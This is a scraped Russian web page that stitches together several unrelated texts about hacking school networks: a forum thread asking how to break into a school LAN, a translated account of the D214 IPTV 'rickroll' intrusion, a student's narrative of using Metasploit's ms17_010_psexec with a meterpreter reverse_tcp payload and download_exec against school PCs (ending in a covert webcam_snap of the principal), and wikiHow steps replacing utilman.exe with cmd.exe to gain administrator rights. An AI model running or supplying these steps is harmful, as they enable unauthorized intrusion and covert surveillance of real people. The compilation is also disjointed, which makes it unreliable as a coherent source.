Как взломать школьную локальную сеть

Обновлено: 05.07.2024

Подскажите можно ли заниматься хакингом, если выходишь в сеть через мобильный телефон. если да то как можно взломать школьную локальную сеть(она подключена к сети по выделенной линии)

Заранее большое спасибо!

Цитата
если да то как можно взломать школьную локальную сеть(она подключена к сети по выделенной линии)
Цитата
Гость пишет:
Мобильный телефон будет считаться как отягощающее обстоятельство.

А ты веником хлеб резать не пробывал?[QUOTE]

Господа! Ну зачем так грубо!
Можно мальчику аккуратно объяснить что к чему куду и зачем.
Это же не политкорректно!

Вот Brainw0rk кинул хорошую ссылочку – это правильно и понятно!

Цитата
Подскажите можно ли заниматься хакингом, если выходишь в сеть через мобильный телефон.

Конечно можно, хоть через мобильный, хоть через модем, хоть через выделенку - главное в интернет выйти, а потом хоть сервера пентагона ломай, кто тебе мешает ?

Цитата
если да то как можно взломать школьную локальную сеть(она подключена к сети по выделенной линии)

В принцыпе можно, но это уже другой разговор, для начала узнай какой внешний IP у компьютера который выходит в интернет (который скорей всего являеться прокси сервером), потом узнай ОС которая стоит на нём, стоят ли на нём файрволы. Потом ищи уязвимости и ломай, короче это довольно долгий процесс, тем более для новичка. Вобще лучше для начала изнутри поробуй что нибудь ломануть, например какой нибудь комп.

Хм .. новая мода - хакинг уничтожающий потенцию =))))) Да чел сиди через трубу - она очень хорошо влимяет на потенцию =))))

Подскажите,как можно взломать сервера на сети,при помощи троянской программы-и где её достать?
[COLOR=red]

Можно ловишь вашего админа, и долбишь его сотовым телефоном по голове пока он тебе все пароли не раскажет.

Наиболее радостный пост во всём топике - персонажа Zubilo

Вообще последнее время не приходится расчитывать, что форум по IT-безопасности закрыт от детей из классов коррекции. При разговоре об анонимности через GPRS, следует отметить, что телефон выступает в роли передатчика, как вашего местоположения (по HLR базам), так и всех ваших данных. Во избежание всех неприятностей требуется дополнительное инкапсулирование трафика через ICMP, блокировка входящих звонков (ну и соотвественно исходящих) звонков в зоне оператора, голова на плечах - думаю, её модернизировать надо в первую очередь для всех желающих взломать пентагоны и т.п.

Один из захваченных дисплеев в средней школе Элк Гроув. Автор фото Том Трэн

Один из захваченных дисплеев в средней школе Элк Гроув. Автор фото Том Трэн

30 апреля 2021 года автор проделал рикролл по своему школьному округу. Это не только моя школа, но и весь школьный городской округ 214 (далее — D214), один из крупнейших школьных округов в Иллинойсе, состоящий из 6 школ, в которых учатся более 11 000 человек.

Подробности рассказываем в этом пятничном посте к старту курса по этичному хакерству.

В этой заметке я расскажу, как я это сделал и как мне удалось избежать обнаружения, а ещё о последствиях, когда я раскрыл себя и не попал в беду.

Disclaimer

Этот пост предназначен только для образовательных целей. Не выполняйте подобные действия без явного разрешения.

Мы подготовили полную документацию обо всём, что мы делали, включая рекомендации по устранению обнаруженных нами уязвимостей. Мы предоставили в технический отдел D214 полный отчёт о тестировании на проникновение на 26 страницах и работали с отделом, чтобы помочь защитить их сеть.

При этом то, что мы сделали, было очень незаконно, и другие администрации могли выдвинуть обвинения. Мы благодарны, что администрация D214 отнеслась к этому с пониманием.

Большой Рик

Для начала вот кое-какие кадры всего этого:

Первый взлом

Эта история начинается с первого курса, когда у меня не было особой технической дисциплины: время, которое я могу описать только как начало моего скриптового детства. Я не понимал основ этики или ответственного раскрытия информации и прыгал от радости при любой возможности что-нибудь сломать.

Я попросил нескольких друзей помочь с этим проектом, и — о, боже, мы сделали это! Наше сканирование генерировало так много трафика, что об этом узнал школьный технадзор и в один прекрасный момент пришёл попросить нас остановиться. Конечно, мы сделали это немедленно, но к тому времени уже закончили сканирование первой половины адресного пространства округа 10.0.0.0/8 — всего 8 388 606 IP-адресов.

В сети округа мы обнаружили различные незащищённые устройства. В том числе принтеры, IP-телефоны… и даже камеры наблюдения без аутентификации по паролю!

14-летний я смотрю на камеру, к которой получил удалённый доступ со своего iPad

14-летний я смотрю на камеру, к которой получил удалённый доступ со своего iPad

И я снова заявляю: никогда не получайте несанкционированный доступ к другим системам без разрешения.

Технический персонал округа был проинформирован о проблеме, которую они решили, добавив ограничения ACL. Однако многие устройства оставались подключёнными к студенческой сети и, что более важно для этой статьи, к системе IPTV!

Система IPTV Exterity

Перед тем как двигаться дальше, я кратко обрисую систему IPTV. Она состоит из трёх элементов:

AvediaPlayers — это небольшие синие коробки, которые подключаются к проекторам и телевизорам. Они могут отправлять последовательные команды на соответствующее устройство для включения/выключения дисплея, изменения входов/громкости, переключения каналов и т. д.

Эти приёмники содержат как веб-интерфейс, так и SSH-сервер для выполнения последовательных команд. Кроме того, они работают под управлением встроенного Linux с инструментами BusyBox и используют какую-то непонятную архитектуру процессора, разработанную для IoT-устройств, под названием ARC (Argonaut RISC Core).

Приёмник AvediaPlayer r9300, который подключается к дисплеям. Изображение от Exterity

Приёмник AvediaPlayer r9300, который подключается к дисплеям. Изображение от Exterity

Далее кодеры AvediaStream подключаются к устройствам, транслирующим видео. Они кодируют прямой эфир, поступающий с этих устройств, на приёмники AvediaPlayer, которые отображают этот поток. Кодеры подключаются к компьютерам, которым необходимо транслировать поток, например текстовые карусели или утренние объявления. Они также имеют встроенное программное обеспечение, аналогичное AvediaPlayers.

И последнее, но не менее важное: AvediaServers позволяют администраторам управлять всеми приёмниками и кодерами одновременно. Их типичные процессоры x86_64 и работают под управлением корпоративного дистрибутива Linux, CentOS. Как и приёмники и кодеры они также имеют веб-интерфейсы и SSH-серверы.

С первого курса у меня был полный доступ к системе IPTV. Я возился с ним всего несколько раз и планировал устроить розыгрыш для старшеклассников, но он отошёл на задворки моего сознания и в конце концов был забыт.

Подготовка

Перед вами второй семестр выпускного класса, начало 2021 года: все школы перешли на гибридное обучение из-за пандемии COVID-19. До этого момента очное обучение проводилось по желанию, большинство студентов, включая меня, обучались дистанционно. Но в марте суперинтендант объявил, что 5 апреля перейдёт на модель отказа от очного обучения.

Поскольку почти все ученики должны были вернуться в школу, я понял, что теперь и стоит устроить выпускной розыгрыш с участием системы IPTV. Через несколько дней я решил поделиться своими мыслями с близкими друзьями.

Одна из 10 лучших фотографий, сделанных до катастрофы

Одна из 10 лучших фотографий, сделанных до катастрофы

1. Полезная нагрузка C2 и эксплойт

Вместо этого как канал управления я использовал SSH-доступ на каждом приёмнике (C2). Я разработал простой сценарий, который послужил поэтапной полезной нагрузкой, загружаемой в каждый приёмник заранее. Этот скрипт содержал различные функции, которые могли выполнять запросы к веб-интерфейсу локально на приёмнике. Благодаря повышенной гибкости полезной нагрузки я также мог создавать резервные копии и восстанавливать настройки приёмника в файловой системе после рикролла:

Это примерная версия полезной нагрузки C2. В реальной полезной нагрузке, чтобы поддерживать работу рикролла, я многократно повторял команды. Например, каждые 10 секунд дисплей включался и устанавливал максимальную громкость.

Таким образом, если кто-то попытается выключить проектор или отключить звук, он вернётся и продолжит воспроизведение. Есть только два способа отключить рикролл — выдернуть вилку из розетки или изменить источник входного сигнала.

Уязвимости, которые эксплуатировались для получения первоначального доступа, были специфичны для конкретной реализации (то есть D214 виновен в использовании паролей по умолчанию). Однако я обнаружил вендорные уязвимости эскалации привилегий во всех IPTV-продуктах Exterity, что позволило мне получить root-доступ во всех системах. Одна из этих ошибок была простым GTFO-bin, но две другие — новые уязвимости, которые я не могу (и не должен) публиковать.

2. Многоадресный стрим RTP

Следующий вопрос, который мы решали, заключался в настройке пользовательского видеопотока для воспроизведения рикролла в режиме реального времени. Нам нужно было транслировать многоадресный трафик, но из-за ограничений ACL это могли делать только кодеры AvediaStream или серверы AvediaServer.

Настройка потока была, пожалуй, самой трудоёмкой частью подготовки, потому что тестирование стало абсолютным мучением. Для разработки мне нужен был только один проектор, но добраться до него нелегко: в классах работают весь день.

Поэтому я тестировал ночью! Подключался к одному из компьютеров класса с фронтальной камерой, направленной на проектор, записывал видео, чтобы проверить, правильно ли проектор отображает поток.

Для проверки качества потока я использовал цикл с прыгающим логотипом DVD.

3. Неожиданное развитие событий

Подобно тому, как AvediaPlayers связаны с AvediaServers, каждая колонка подключалась к серверу EPIC своей школы. Веб-интерфейс этих серверов был скрыт за страницей входа.

Админский доступ к системе звонков

Админский доступ к системе звонков

У нас был доступ только к системе EPIC этой отдельной школы, ведь только у неё были уязвимые учётные данные.

Но я обнаружил, что взломанный нами сервер EPIC еженедельно создавал резервные копии своей конфигурации на внешнем файловом ресурсе SMB. Учётные данные для этого SMB-сервера оказались такими же, как учётные данные по умолчанию в системе EPIC. Каждая резервная копия содержала SQL-дамп имён пользователей и хешей паролей.

А что, если другие системы EPIC также имеют серверы резервного копирования? А поскольку эти резервные серверы находятся отдельно от серверов EPIC, они могут по-прежнему использовать учётные данные по умолчанию.

Именно так и было! Оттуда я смог получить доступ к хешам паролей для других серверов EPIC и определить учётную запись локального администратора, доступную на всех серверах EPIC. После взлома пароля мы получили контроль над всеми расписаниями звонков в округе!

Исполнение

Одним из наших главных приоритетов было не допустить срыва занятий, то есть мы могли провести розыгрыш только до начала занятий, во время перемен или после уроков. До пандемии некоторые занятия начинались раньше, некоторые позже, в некоторых было блочное расписание, а в некоторых все уроки проходили в один день. Удобно, что благодаря COVID-19 все средние школы в округе перешли на единое блочное расписание, поэтому нам не нужно было беспокоиться о составлении расписания для каждой школы.

Ещё один момент — выпускные экзамены были не за горами. Наибольшее беспокойство вызвало стандартизированное тестирование, в котором не будет перерывов. Мы выбрали 30 апреля, это была пятница перед началом экзаменов по курсам повышенной сложности. Также мы провели обширный опрос, чтобы выяснить, проводились ли в этот день какие-либо значимые тестирования. Мы были полностью готовы всё отменить, если бы узнали, что проводится стандартизированное тестирование.

За несколько недель до Большого Рика мы установили полезную нагрузку C2 на все AvediaPlayers в автоматическом режиме, тщательно распыляя наши действия, чтобы избежать обнаружения. В день Большого Рика мы использовали два из семи серверов AvediaServers в качестве C2-мастеров, которые подключались ко всем AvediaPlayers и выполняли полезную нагрузку. Ниже приводится хронология событий 30 апреля:

Хронология событий

10:40. Поток рикролла запускается с 20-минутным обратным отсчётом.

10:55. Системы плеера Avedia инициализируются, включаются дисплеи и активный канал меняется на поток рикролла.

11:00. Поток завершает обратный отсчёт с проигрыванием рикролла в конце первого блока.

11:10. Полезная нагрузка восстанавливает системы AvediaPlayer в их предыдущее состояние и удаляет себя.

14:05. В конце третьего блока вместо звонка играет рикролл.

14:15. Отчёт о тесте на проникновение автоматически отправляется техническим руководителям.

15:25. Начался ещё один звонок с подменой. Если районные технические специалисты всё ещё не выяснили, что произошло, чтобы вернуть звонки, в конце дня прозвучит 1-минутная версия 3-секундного звонка в конце дня, [то есть прозвучит звонок в 20 раз дольше].

Они всё же догадались, поэтому я включил аудиофайл сюда, чтобы и вы смогли им насладиться:

Последствия

Через несколько дней после отправки отчёта через анонимный электронный ящик мы получили ответ по электронной почте от директора по технологиям D214. Директор заявил, что из-за наших рекомендаций и документации округ не будет применять дисциплинарные меры. Более того, он поблагодарил нас за наши выводы и попросил, чтобы мы предоставили отчёт команде технических специалистов. Позже он рассказал, что сами руководители проверили наш отчёт и были впечатлены им.

Я был в восторге от того, что администрация открыта для исправления своих проблем и проведения аудита вместе с нами. Хотя администрация D214 заявила о добрых намерениях (и действительно придерживалась их в будущем), мои сверстники не доверяли ей и скептически отнеслись к истинной природе встречи — один из них назвал всё это спецоперацией!

Мы решили, что на встрече Zoom я раскрою себя, чтобы представить слайды для подведения итогов, а остальные останутся анонимами. Я планировал объявить о своём участии с самого начала, так как хотел опубликовать этот пост в блоге. Но на всякий случай я назначил дебрифинг на время после окончания учёбы.

Да, это реальный слайд из нашего брифинга. Не @ меня [мне всё равно, что вы подумаете]

Да, это реальный слайд из нашего брифинга. Не @ меня [мне всё равно, что вы подумаете]

Если серьёзно, дебрифинг прошёл очень хорошо и стал продуктивным для всех. Мы ответили на уточняющие вопросы технической команды и дали дополнительные советы по устранению проблемы. Нам даже удалось заставить округ рассмотреть возможность расширения программы IT/кибербезопасности и, надеюсь, спонсирования CTF в D214. Это одно из самых удивительных впечатлений из моей жизни в старшей школе, и я благодарю всех, кто поддержал меня. Это всё, и спасибо, что прочитали.

А что вы взломали в своей школе? Поделитесь в комментариях.

Продолжить погружение в IT, чтобы научиться решать проблемы бизнеса, вы сможете на наших курсах:

Вступление :
Все происходило в 2017 году.У нас в школе есть такая фишка как радио — на каждом этаже есть две пары колонки на которых во время переменной играет музыка выбранная учителями(колонки подключены к пк в кабинете заместителя директора).Недавно нам в школу завезли Мультимедийные доски,ноутбуки (Просто наши печки на win xp, с 1 gb озу были убогими), и 2 wifi роутера). Роутера купили специально для ноутов,потому что провода от старых пк были короткие. Так как я никогда , с покупки сим-карты,не платил за интернет то я подумывал как спизд*ть пароль.

Этап первый (Пароль от роутера) :
Нас в классы где есть новые доски не пускали, потому что доски стоят over дох*я, но одному учителю было пох*й (это был учитель физики).И от перемена, сидим мы в классе (человек 3-5 вместе с моим другом), и физик говорит, что идет в столовою есть.Так как ноут работает и подключен к wifi роутеру, я решил не терять момент. Сказал другу идти к двери и палить физика.Тем временем я за 2 минуты с помощью Командной строки и парочки команд спизд*л пароль. Я рад, но мои знания о linux и существования такого инструмента как Metasploit framework мне подсказывали, что з ситуации можно выжать больше.

  1. Скачал Termux и обновил репозитории
  2. Установил в termux Git
  3. Установил nmap
  4. Скачал скрипт установки metasploit в termux и запустил
  5. Установиласть msf 4.16, а мне надо версия 5,0 потому что там есть екслоит ms17_010_psexec
  6. Удалил дерикторию msf 4.16
  7. Скопировал metasploit 5.0 с github с помощю git
  8. Перешол в дерикторию msf
  9. Прописал: bundle install
  10. Установил
  1. Запустил msf (msfconsole)
  2. use exploit/windows/smb/ms17_010_psexec
  3. set DBGTRACe 1
  4. set VERBOSE 1
  5. set PAYLOAD windows/meterpretr/reverse_tcp
  1. Я открыл вторую вкладку в Termux.
  2. nmap -sn 192.168.0.1/24 - просканировал всю сеть.
  1. Так как при попытке выгрузить .mp3 файл на удаленный пк у меня закрывается сессия meterpreter, я нашел post модуль для того чтобы пк скачал файл и открыл ето.
  2. background - Я свернул сессию meterpreter
  3. post/windows/manage/download_exec - использую этот модуль
  4. set SESSION 3 - установил целю сессию
  5. set URL url - ссылка на файл .mp3 в сети
  6. Там нужно установить еще название файла, но я забыл комманду
  7. Запустил

    Случайным образом я узнал, что у нее эсть вебка, и я прописал webcam_snap и получил фото дериктрисы

Соавтор(ы): Jack Lloyd. Джек Ллойд — автор и редактор, пишущий о технологиях для wikiHow. Имеет более двух лет опыта в написании и редактировании статей на технические темы. Энтузиаст всего связанного с технологиями и учитель английского языка.

Из этой статьи вы узнаете, как получить права администратора на школьном компьютере. Имейте в виду, что если в школе стоят компьютеры Mac (хотя это маловероятно), их взломать не получится. Также взломать компьютер нельзя, если доступ к BIOS заблокирован.

Изображение с названием Hack Into a School Computer Step 1

Определите версию Windows. Хотя последней версией Windows является Windows 10, многие школьные компьютеры по-прежнему работают под управлением Windows 7. Если на компьютерах установлена Windows 7, используйте этот метод.

Изображение с названием Hack Into a School Computer Step 2

Изображение с названием Hack Into a School Computer Step 3

Подключите флеш-накопитель к домашнему компьютеру. Так как на многих школьных компьютерах установлены ограничения, флеш-накопитель придется настроить на домашнем компьютере (или любом другом компьютере, на котором нет ограничений).

Изображение с названием Hack Into a School Computer Step 4

Изображение с названием Hack Into a School Computer Step 5

  • Не беспокойтесь — вы не устанавливаете Windows 10, а просто создаете установочный флеш-накопитель с помощью скачанного средства для установки Windows 10.

Изображение с названием Hack Into a School Computer Step 6

  • Процесс может занять 30 минут, поэтому не отключайте флеш-накопитель.

Изображение с названием Hack Into a School Computer Step 7

  • На ноутбуке USB-порты расположены на боковых панелях.

Изображение с названием Hack Into a School Computer Step 9

Изображение с названием Hack Into a School Computer Step 10

Изображение с названием Hack Into a School Computer Step 11

Откройте командную строку. На экране установки нажмите ⇧ Shift + F10 . Откроется окно командной строки.

Изображение с названием Hack Into a School Computer Step 12

  • введите move c:\windows\system32\utilman.exe c:\windows\system32\utilman.exe.bak в командной строке;
  • нажмите ↵ Enter ;
  • введите copy c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe в командной строке;
  • нажмите ↵ Enter .

Перезагрузите компьютер без флеш-накопителя. Нажмите и удерживайте кнопку питания, чтобы выключить компьютер. Извлеките флеш-накопитель и нажмите кнопку питания, чтобы включить компьютер. Теперь создайте дополнительную учетную запись администратора.

Перезагрузите компьютер. Нажмите и удерживайте кнопку питания, чтобы выключить компьютер, а затем еще раз нажмите кнопку питания, чтобы включить его.

Изображение с названием Hack Into a School Computer Step 15

Подождите, пока откроются дополнительные варианты загрузки. В большинстве случаев компьютер предупредит вас, что Windows не завершила работу должным образом, поэтому выберите одну из опций с помощью клавиш со стрелками.

Изображение с названием Hack Into a School Computer Step 16

Выберите Обычная загрузка Windows . Эта опция находится посередине экрана. Чтобы подтвердить свой выбор, нажмите ↵ Enter .

Еще раз перезагрузите компьютер с помощью кнопки питания. Компьютер перезагрузится и откроются дополнительные варианты загрузки.

Изображение с названием Hack Into a School Computer Step 19

Выберите Запуск средства восстановления при загрузке (рекомендуется) . Эта опция находится посередине экрана. Запустится средство восстановления при загрузке.

Изображение с названием Hack Into a School Computer Step 20

Изображение с названием Hack Into a School Computer Step 21

Изображение с названием Hack Into a School Computer Step 22

Изображение с названием Hack Into a School Computer Step 23

Изображение с названием Hack Into a School Computer Step 24

Изображение с названием Hack Into a School Computer Step 25

Изображение с названием Hack Into a School Computer Step 26

Изображение с названием Hack Into a School Computer Step 27

Подождите, пока откроется экран входа в систему. Это произойдет, когда компьютер завершит перезагрузку.

Изображение с названием Hack Into a School Computer Step 29

Щелкните по значку Диспетчера утилит. Он выглядит как циферблат со стрелкой и находится в нижней левой части экрана. Так как вы заменили Диспетчер утилит на командную строку, откроется окно командной строки.

Изображение с названием Hack Into a School Computer Step 30

Изображение с названием Hack Into a School Computer Step 31

Изображение с названием Windowspower.jpg

Изображение с названием Hack Into a School Computer Step 32

Изображение с названием Hack Into a School Computer Step 33

Изображение с названием Hack Into a School Computer Step 34

Работайте на компьютере с правами администратора. Теперь, когда вы вошли в систему как администратор, можно пользоваться всеми системными службами и программами.

  • Получив права администратора, школьным компьютером можно пользоваться как любым другим компьютером. То есть можно устанавливать программы, менять настройки и так далее.
  • Во многих школах используются программы контроля, которые следят за тем, что вы делаете на компьютере. В этом случае вас поймают, если вы взломаете компьютер.
  • Взлом школьного компьютера противоречит школьным правилам, поэтому вас могут наказать.

Дополнительные статьи

прикинуться хакером

обнаружить спрятанные камеры и микрофоны

запустить программу из командной строки

передать данные с одного жесткого диска на другой

загрузить музыку со Spotify

найти потерянный пульт от телевизора

стать хакером

отобразить скрытые меню в телевизорах LG

запустить HTML файл

создать электромагнитный импульс

использовать контроллер PS3 на компьютере

создать виртуального помощника наподобие JARVIS

подключить смартфон к телевизору Hisense

Об этой статье

Читайте также: